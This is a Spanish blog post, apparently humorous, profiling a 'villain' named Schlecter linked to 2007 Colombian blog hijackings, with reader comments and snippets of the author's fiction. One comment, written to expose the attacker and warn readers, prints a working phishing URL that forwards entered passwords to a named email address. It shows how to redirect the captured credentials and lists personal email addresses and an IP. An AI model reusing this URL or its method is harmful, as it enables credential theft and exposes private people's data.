Skip to main content

Galeria de villanos (4). Schlecter

Nombre Verdadero: Desconocido
Genero: Masculino
Lugar de Nacimiento: Aragca
Edad: Mas de 500 años
Estatura: 1.55 m
Ocupacion: Hacker Black Hat (a medio tiempo), Critico de blogs (a medio tiempo), Ajedrecista (a medio tiempo)
Alias: (Se conocen mas de 35) El Minotauro, Frank Morris, NeverGambits, Scaramanga, Slade, Rabito, zIro, Z-Blog, sO, Goliardo, etc, etc...
Agrupaciones: Apriz 11, Xala Xalur Xampli, 8, SPECTRA, KGB, CIA
Paradero Actual: Desconocido
Pagina Web: NeverGambits
-
Pocas veces he escrito algo negativo acerca de un compañero blogger, pero la situacion actual es bastante grave y por un momento he decidido hacer una excepcion a esta regla.
-
Schlecter es a mi juzgar un personaje fascinante aunque mal entendido, muchos lo han querido ver como uno de los mas grandes villanos de la blogosfera colombiana y lo tacharon de hacker y troll, (aunque el reclamaba ser un Balrog o Un "Señor Oscuro"). Aunque yo creo que Schlecter, ni siquiera podria cambiar el template de un blog....Los terribles (y graves) sucesos ocurrieron asi:
-
En 2007 aparecieron hackeados (borrados) varios blogs, los cuales dejaron solamente un letrero con este misterioso mensaje: "Another blog hacked by Mr. Schlecter (Apriz 11)" enlazado al blog del personaje en cuestion. Mucho se ha escrito sobre este suceso. Aqui una de las versiones segun Victor Solano aunque tambien se encuentran con google otras visiones del mismo evento, como esta: Como silenciaron a Pais Bizarro.
-
Nunca se supo quien era el misterioso Apriz 11, ni hay ningun rastro en internet de esa extraña organizacion criminal. No se conocen sus lideres, ni el numero de integrantes, ni sus motivaciones. Es mas misteriosa que SPECTRE.
-
¿Era parte de esta misteriosa organizacion delincuencial Schlecter? Nunca lo sabremos, pues jamas lo afirmo, ni jamas lo desmintio, ni nunca lo nego.
-
¿Volvera a atacar el Apriz 11?
-
¿Necesita una 'dieta sangrienta', esta misteriosa organizacion criminal?
-
¿Es Schlecter el oculto lider del Apriz 11?
-
¿Existe Schlecter?
-
(Quizas tu eres "un" Schlecter)

Comments

  1. Perdone si mis preguntas son un poco estúpidas, pero provienen de la ignorancia del caso. Hay mas de un punto que no comprendo:

    - Ud dice que los blogs hackeados linkeaban a Schlecter (o sea Ud)
    - El articuo de Solano culpa a un tal Jaime Ruiz, de Pais Bizarro, y dice que el link enlazaba a Ruiz.

    Entonces? hay algo que no encaja, a menos que Ud se llame Jaime Ruiz o sea su socio. Evidentemente, hay muchisima informacion que falta aqui para entender cabalmente el asunto, que tal si lo explica un poco mejor?
    Saludos.

    ReplyDelete
  2. PD: Me enseñaria a hackear un blog? :)

    ReplyDelete
  3. Nunca he conocido personalmente al tal Schlecter, pero creo que fue alguien que me robo la identidad, copiando el nombre de mi blog.

    Fijese que solano describe que los ataques se hicieron desde Colombia, asi que ninguno de nosotros pudo ser porque ya habiamos inmigrado a Australia.

    Jaime Ruiz es en realidad un prestigioso periodista, del blog Atrabilioso. (ver mi lista de recomendados).

    Creo yo que el apriz 11 queria enlodar la imagen de Schlecter, haciendolo pasar por jaime ruiz.

    Bueno no se, finalmente Schlecter desaparecio junto con sus blogs, que eran tan solo pura poesia.

    Yo he venido investigando estos graves sucesos y cada vez me encuentro mas confuso.

    Ahora mismo aparecio en mi c-box un personaje que reclama ser Jaime Ruiz en persona.

    Pero no creo porque Ruiz jamas viene a este blog.

    El c-box no permite certificar la identidad de un usuario.

    Yo por mi parte tambien soy nuevo en el asunto y seguire investigando

    ReplyDelete
  4. Mmm inocente 22, a mi se me hace que Uds ya sabe de esas cosas, :P
    Estoy como perro en cancha de bochas, Ud señor tan amable es el villano Schlecter?
    Después de la foto de Gabriel en tutu ya puedo esperar cualquier cosa, será que la inmigración despierta cosas ocultas en nosotros?

    ReplyDelete
  5. Qué foto mía en tutú???!!!!

    Es un fotomontaje!!! Debe haber sido Schlecter!!

    (La verdad, estoy igual que el 22, no cacé un fulbo)...

    ReplyDelete
  6. No caben dudas de que Schlecter es el creador de este Blog. Solo falta corroborar que El y el Comodin son la misma persona, o que este ultimo es un sidekick del villano en cuestion.
    Debido a sus multiples personalidades, ya dudo de la identidad de todos los bloggers, Paulys podria ser Schlecter, o toda mi barra de contactos, es mas, ya dudo de mi mismo, sere una mera creacion de este maquiavelico personaje?
    Creo que el Comodin sigue ocultandonos valiosa informacion.

    ReplyDelete
  7. estoy perdida y no entiendo nada

    socorro

    ReplyDelete
  8. Y si Zanoni es el Schlecter verdadero y aburrido de hackear empezó a matar gente (posteo que se había muerto Menem y alguien subió esa información en Wikipedia)

    ReplyDelete
  9. Leandro Zanoni es un pseudo periodista que tiene un blog llamado eblog.com.ar

    ReplyDelete
  10. La situación es muy grave y está tomando proporciones dantescas. Creo que debemos exigir al Comodin una explicación pormenorizada de los hechos.

    ReplyDelete
  11. Reviviendo viejas glorias? esto es ya cuento viejo mal hechado...

    ReplyDelete
  12. El Autor del Blog25 November 2009 at 07:46

    Para los Argentinos.

    Yo NO soy Schlecter.

    ¿Acaso Cervantes era El Quijote?

    ¿Acaso Conan Doyle era Sherlock Holmes?

    Ni siquiera soy "el Comodin".

    Existe una clara diferencia entre personaje y autor a nivel de libros, mas no en blogs.

    La gente cree que el personaje que encabeza el blog es el mismo Autor, y paa mi no es si.

    Primero que todo Schlecter mide 1.50 m de estatura y es negro.

    "El Comodin" es mi mas reciente creacion, todavia lo estoy perfilando.

    A Schlecter le gustaba escribir poesia al Comodin francamente le disgusta.

    Ni Sancho ni Alonso Quijano eran Cervantes....

    ReplyDelete
  13. Torin

    Bueno he revivido el tema a causa de que un ex-apriz 11 se presento a mi c-box reclamando que tenia vital informacion sobre el caso.

    Asi que cree esta ventana de discusion para conocer mas del tema.

    Las discusion apenas comienza.

    ReplyDelete
  14. Tenga cuidado. Hay gente que llega a matar a traves de un alter ego. Eso se llama psicosis. En la vida de ficcion la linea es muy delgada, es muy facil deslindar responsabilidades en nombre del arte y la imaginacion.
    En fin, disculpe mi ignorancia de "argentino".

    ReplyDelete
  15. Para el 22 (de nov 24 a las 3:25 pm)

    ¿Cómo se las arreglaron los difamadores para obtener las contraseñas?
    La trampa usada para robar las contraseñas de los blogueros fue inicialmente un exploit publicado en un dominio que ya expiró (themsn.com). Aunque dicho exploit no dejaba a la vista la cuenta de correo del destinatario de las contraseñas robadas, en vista de que en este mes el dominio expiró, el malhechor cometió otro error: por no saber programar su propio exploit, se vio obligado a recurrir a un exploit menos elaborado que evidenciaba la cuenta de correo que recibía las contraseñas:

    http://taebo-xtreme.com.ar/php/gu/ver_Gmail.php?tipo=g&mailpide=aprix11@mail.com&mail=ahrosero@gmail.com
    &emisor=camidelco@yahoo.com.ar&emisornom=Cami&pass=&
    Tarjeta=http://i.gusanito.com/g/gusanito/cards/4003/card.swf
    &msg=Hola,

    En algunos blogs se ha mostrado en qué consiste la trampa: a un editor de un blog un día le llega un correo que le pide reactivar su cuenta de Hotmail, o una invitación para usar GTalk. En ocasiones una supuesta tarjeta virtual.

    Al abrir el mensaje, éste tiene un vínculo que supuestamente lleva a la víctima a la página oficial de los servicios de Hotmail o Gmail, donde se le vuelve a pedir su login y contraseña. Pero el vínculo real es el expuesto arriba, un exploit algo torpe hospedado en taebo-xtreme.com.ar, y que por URL transfiere la cuenta de correo del destinatario de la contraseña (aprix11@mail.com), la cuenta de correo de la víctima (rosero@gmail.com), y una cuenta de correo del supuesto remitente de la invitación (camidelco@yahoo.com).

    Esta técnica ampliamente usada en el robo de contraseñas e información personal se conoce como phishing, y cabe anotar que algunas de las víctimas del segundo ataque, entre ellas Bilioso, estaban advertidas sobre el tema y sin embargo cayeron.

    Los invitamos a hacer una prueba muy sencilla para comprobar que aprix11@mail.com es el correo del saboteador:

    Se copia la URL en la barra de dirección del navegador y se cambia el correo aprix11@mail.com, por una cuenta propia. Los demás datos se pueden dejar. Se abre la URL y se escribe cualquier contraseña en el cuadro de acceso. En segundos, en la cuenta de correo propia, llegará un email procedente de taebo-xtreme.com.ar con el login y la contraseña escrita en el momento de la prueba.

    Pero, ¿a quién pertenece aprix11@mail.com? ¿Y la IP 190.65.0.19?

    Nuestra intención no es identificar con nombre y apellido al atacante, sino dejar toda esta información en manos de toda la comunidad y de las autoridades para que saquen sus propias conclusiones y tomen las medidas que consideren pertinentes.

    Lo único que queremos dejar claro es que quienes se empeñaron en acusarnos de ser los autores de los ataques, bien de manera explícita como de manera vergonzosamente solapada, actuaron de muy mala fe, más allá del margen de la duda que pueda dejar la falta de información sobre el atacante real.

    Seguridad en las contraseñas

    Lo más importante es no dar la contraseña nunca. En algunos casos, los piratas generan plantillas de comentarios que les envían las contraseñas a sus cuentas de correo, por lo que cuando se use Blogger y no se tenga confianza en la página es mejor opinar como "otros" y enlazar la dirección del propio blog.

    Hay que cambiar la contraseña con frecuencia y hacerla segura: combinar mayúsculas, minúsculas, números y signos, y lo más largas que sea posible: se pueden usar 16 caracteres. Las mnemotecnias que convienen son diversas, todas válidas si se cumplen las condiciones anteriores sobre extensión y diversidad de los signos. Una frase inolvidable para uno y en lo posible íntima, reemplazando la mitad de las letras por signos o números y poniendo mayúsculas arbitrarias, sería un buen caso. Se recomienda no usar el signo ' en las contraseñas, los demás sí se deben usar.

    ReplyDelete
  16. Para el 22 de November 25, 2009 9:09 AM

    Bueno creo que este doloroso asunto es totalmente desconocido en la blogosfera salvo la colombiana.

    Obviamente este post cumple una labor informativa y hasta caritativa.

    En cuanto a lo de alteregos, supongo que Tolkien, jamas supuso que el era frodo....

    Yo se quien soy, y quien no soy.

    Saludos

    ReplyDelete
  17. Le agradezco muchisimo la explicacion, imaginaba algo un poco mas elaborado que phishing por email, me extraña que gente habituada a este medio caiga en esas trampas.

    Off Topic: le borré un comentario en mi Blog, nada personal, pero no quiero otra "guerra fraticida" involucrando, esta vez, a Ziegler.
    Espero que lo entienda. Yo tambien despareceré de sus comentarios, por un mes o dos.
    Saludos.

    ReplyDelete
  18. Con una semana es suficiente...

    ReplyDelete
  19. Schlecter, uno de mis bufones favoritos en la red. No voy a decir qué bueno que regresó, pero enhorabuena: otro imbécil para reirme un rato.

    (Soy Bilioso, por supuesto, pero desde que Schlecter se puso de sapo con blogger me banearon hasta de gmail)

    ReplyDelete
  20. Anonimo de las 10:34.

    Pues eso es lo raro, que Schlecter, no ha regresado de ninguna parte... es un personaje ficticio.

    Asi que no se puede ni haber ido, ni pudo haber venido.

    ¿Por que nadie puede entender esto?

    En todo caso no conozoco al tal Bilioso...¿es otro personaje desarrollado por Schlecter?

    ReplyDelete
  21. Ya terminó de mamárselo a su patroncito Jaime Ruiz o DieGoth se puso muy celoso?

    ReplyDelete
  22. Ja ja Anonimo del 11 de Diciembre 8.26 am, se va a ganar una suspension del blog por media semana, si continua mal usando el privilegio de comentar en este blog.

    ReplyDelete

Post a Comment

Popular posts from this blog

Doctor Moreau Salamander

Sin saber como, Carbonell logro acomodar las cabezas de sus amigos Cluzo y Puaro dentro de una maleta, se montó en uno de sus vehículos para ir al encuentro del Doctor  Moreau Salamander, de acuerdo con las indicaciones que le presto Esculi. Luego de varias horas de conducir por diferentes caminos y carreteras inciertas, logro llegar a un poblado de gente sencilla aunque no muy amigable.  Trato de indagar en donde podría encontrar al Doctor Salamander, pero apenas la gente escuchaba el nombre, hacían mala cara y corrían como despavoridos. Únicamente un borracho que estaba tirado en el piso le indico que siguiera por la carretera norte, saliera del pueblo y en unos 10 kilómetros  apenas se adentrara en el Bosque de las Lágrimas, encontraría una vieja mansión en donde allí conocían a Salamander. Sin tener más opciones, Carbonell hizo de tripas corazón y siguió con cierta dificultad las indicaciones de su muy dudoso guía. El camino por el que lo habían mandado estaba deshabitado, no había

Retos Oniricos

13) Al despertar, un personaje tiene la visión de una cortina roja y amarilla. Una visión que no se disipa. ¿Qué hay detrás de la cortina? La visión era espeluznantemente REAL, había una cortina Roja y Amarilla, era la bandera del Sol Naciente en 1942. De repente comenzó a escuchar motores de avión, ruidos de metralleta y los sonidos estruendosos de bombas estallando. No salía de su asombro cuando sintió en las costillas un fuerte golpe y una voz que le decía: "Desde este momento sus vidas son propiedad del Emperador del Japón". Al caer al suelo miro bien y vio que estaba en la cubierta metálica de un enorme portaviones. Pero otro golpe brutal en su humanidad volvió a nublarle la mente. Al despertar de nuevo, sintio que estaba amarrado a una pesada ancla, escucho que le dijeron: " ¿ Cuál es el nombre de su navío?" Como no respondía, comenzó a recibir más y mas golpes y el Jefe de ellos hizo una señal a sus subordinados y lo lanzaron al agua como si fuera basura, se

Presentacion de Zaida

  NFP 2436

Reflexiones tardias sobre el periodo historico de La Violencia

Ya hace mucho tiempo que no escribo en el blog algo completamente personal, desde la pandemia hacia acá,  comencé a desarrollar cuentos y relatos de Aragca. Pero hubo casi una década en la que el blog no tenía mayor contenido de mi mismo como persona. Ya hace unos meses que detuve la producción de historias y no sabía el 'porque', pensé que era algún tipo de "síndrome de hoja en blanco" o quizás se me había nublado la mente debido a una combinación de factores, entre esos que comencé a perder ELO en los sitios en los que juego ajedrez. Perdía y perdía partidas  Luego blogger cambio el sistema de comentarios y quede por fuera de las plataformas debido a que Safari solo me permite comentar como anónimo. Entonces me he limitado a comentar exclusivamente en algunos blogs, con nombre propio, usando otro navegador. Pero, ni siquiera era eso lo que me tenía nublada la mente. Supongo, pues, que los graves acontecimientos políticos que ocurren por aquí y por allá también tiene

Futuro en prosperidad

-¿Viste que inventaron una máquina para reemplazar las escaleras en los edificios? - Dijo la Detective Ada Esculli - Sí. Es la noticia de la que todo el mundo habla hoy en día - Respondió dubitativo el Inspector Carbonell - Pues me parece una máquina muy horrible, tengo un mal presentimiento de todo ello - Mejor para nosotros. - oh Carbonell. Querido, no tienes corazón ¿cómo puedes pensar de ese modo? - Pues si algo malo ocurre, es en beneficio nuestro, la gente va a tener que llamarnos por lo que ocurra en esas cajas elevadoras - ¿Malo? ¿Cómo que? - Te apuesto a que pronto cada edificio importante va a tener una de esas nuevas máquinas elevadoras - De acuerdo, pero y ¿cómo nos beneficia? - Te aseguro que tarde o temprano cadáveres van a aparecer en esas cajitas y nosotros tendremos que ir a investigar los fatídicos sucesos. Hoy en día tenemos al menos 50 rascacielos en esta ciudad. Y en una década habrá 100 o 1000 .... solo imagínate: Tendríamos al menos 20 o 30 casos para investigar

El Oro de Uganda

Si hay todo ese oro en Uganda, pues de ahora en adelante solo queda esperar que en aquel lugar las elites mundiales comenzarán a ejecutar la Orden 66 Comenzara un baño de sangre de proporciones épicas, pues la ONU no perdona y nadie se les escapa Apareceran "Heroes" luchando bajo la bandera de "liberar al pueblo de sus opresores" Todo por unas piedras amarillas A no ser que el Oro Ugandes sea igual que las Cartas Niguerianas Amanecera y Veremos porque ya hay quien dice que no son Toneladas sino Onzas... Aunque no todo debe ser "malo" o tenebroso, si hay todo ese oro tambien podremos ver por YouTube o en blogs las aventuras de algun joven Guatemalteco (o Argentino o Leton, el sitio no importa) mostrándonos en una serie de videos todas su aventuras en la mina. De mi lado lo que allí ocurra tambien sera motivo de inspiración para escribir 2 o 3 historias bien sabrosas como siempre ambientadas y distorsionadas en los mundos de Aragca https://www.miningreview.c

La fabrica de ascensores

Los detectives Lestrade y Sofía, están por terminar las pesquisas policiales de los despojos mortales de una misteriosa mujer que murió en el ascensor de una fábrica. De repente se presenta un piquete de personajes siniestros: Una mujer vestida como bailarina, Un Ventrílocuo que lleva una muñeca horrenda, 3 payasos y 6 gorilas portando los uniformes y emblemas de la Facción Fantaso. La Muñeca mueve la boca y dice a Lestrade: " Somos de la oficina del forense, La detective Hada Skull, aquí presente, hará la diligencia de levantamiento del cadáver, por favor llene y firme los impresos ", Y la Bailarina al mismo tiempo le entrega a Lestrade un pesado folio de papeles burocráticos.  Lestrade rojo de ira esta a punto de contestar algo, pero Sofía lo interrumpe diciendo solemnemente: "Detective Skull proceda". Los 6 Gorilas sin perder tiempo suben a la difunta a una camilla, y toda la Troupe de personajes entra en un diminuto Volkswagen escarabajo  que con mucha imaginaci

En Huelga

 El nuevo sistema de comentarios de blogger, NO SIRVE. Entro en huelga:  No volvere ni a comentar ni escribir cuentos mientras Blogger no de solución a este problema que perjudica a tantos autores aqui en la blogosfera. De todos modos si voy a mantener atenta lectura de varios blogs que me agradan mucho.

Cambios en el Blog

Aviso a la audiencia que la actriz que interpretaba a la detective Ada Esculi fue oficialmente reemplazada por la vedette Rosa María, la cual se ha preparado intensamente para asumir este enorme reto. Esta adquisición le dará una dimensión nueva y fresca al personaje. Rosa María debutará en el próximo episodio junto al actor que viene encarnando al Inspector Carbonell desde hace ya varios años.

Heilung Krigsgaldr

La primera Zaida que registran los textos de Aragca, nos remonta al paleolítico.  En aquellos días no tocaba el clavicémbalo,  pero si hacia música: Con los huesos de sus enemigos y ocasionalmente con las costillas de algún marido. Cantaba como un pajarito la muy diabla